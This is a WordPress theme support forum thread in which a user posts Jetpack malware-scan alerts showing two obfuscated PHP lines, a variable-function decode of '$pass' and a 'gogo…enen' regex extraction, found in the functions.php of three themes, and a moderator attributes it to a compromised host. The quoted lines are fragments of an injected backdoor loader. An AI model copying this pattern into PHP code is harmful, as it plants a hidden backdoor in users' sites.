malicious code

Home Forums All Other Themes malicious code

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #187326
    adVETsityadVETsity
    Participant
    • Topics: 1
    • Replies: 1
    • Total: 2
    Member since: February 6, 2021

    Can someone help me with this? Received a total of three. Is that code legit? It was a part of the zip file.
    The file functions.php contains a malicious code pattern
    Threat found (php_suspicious_variable_function_005)
    More
    What was the problem?

    Jetpack found a code pattern that is commonly present on known malicious code. This signature will flag any suspicious usage of PHP’s Variable functions. The code in these files needs to be reviewed, and possibly cleaned.

    The technical details

    Threat found in file:

    /home1//public_html/wp-content/themes/skeleton-reworked/functions.php
    41
    42
    43

    $reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
    preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

    #187346
    Shri SShri S
    Keymaster
    • Topics: 10
    • Replies: 6937
    • Total: 6947
    Member since: June 12, 2013

    Skeleton theme is not part of SKT Themes so not sure why you post some other theme issues here?

    Regards,
    Shri

    #187391
    adVETsityadVETsity
    Participant
    • Topics: 1
    • Replies: 1
    • Total: 2
    Member since: February 6, 2021

    Here you go. I received three threats from Jetpack. The theme I installed was the skt-finance. Below are the three threats.

    /home1//public_html/wp-content/themes/skt-finance/functions.php
    41
    42
    43

    $reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
    preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

    /home1//public_html/wp-content/themes/sinatra/functions.php
    41
    42
    43

    $reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
    preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

    /home1//public_html/wp-content/themes/skeleton-reworked/functions.php
    41
    42
    43

    $reqw = $ay($ao($oa(“$pass”), ‘wp_function’));
    preg_match(‘#gogo(.*)enen#is’, $reqw, $mtchs);

    #187392
    Shri SShri S
    Keymaster
    • Topics: 10
    • Replies: 6937
    • Total: 6947
    Member since: June 12, 2013

    When it’s giving errors for all function files of all themes then the hosting itself has got malware and have been hacked probably.

    The code does not exist in our theme by default. You yourself have posted sinatra and skeleton themes function files as well.

    Please ask hosting to resolve and then use wordfence etc to clean up. It might have also affected database as well.

    Regards,
    Shri

Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.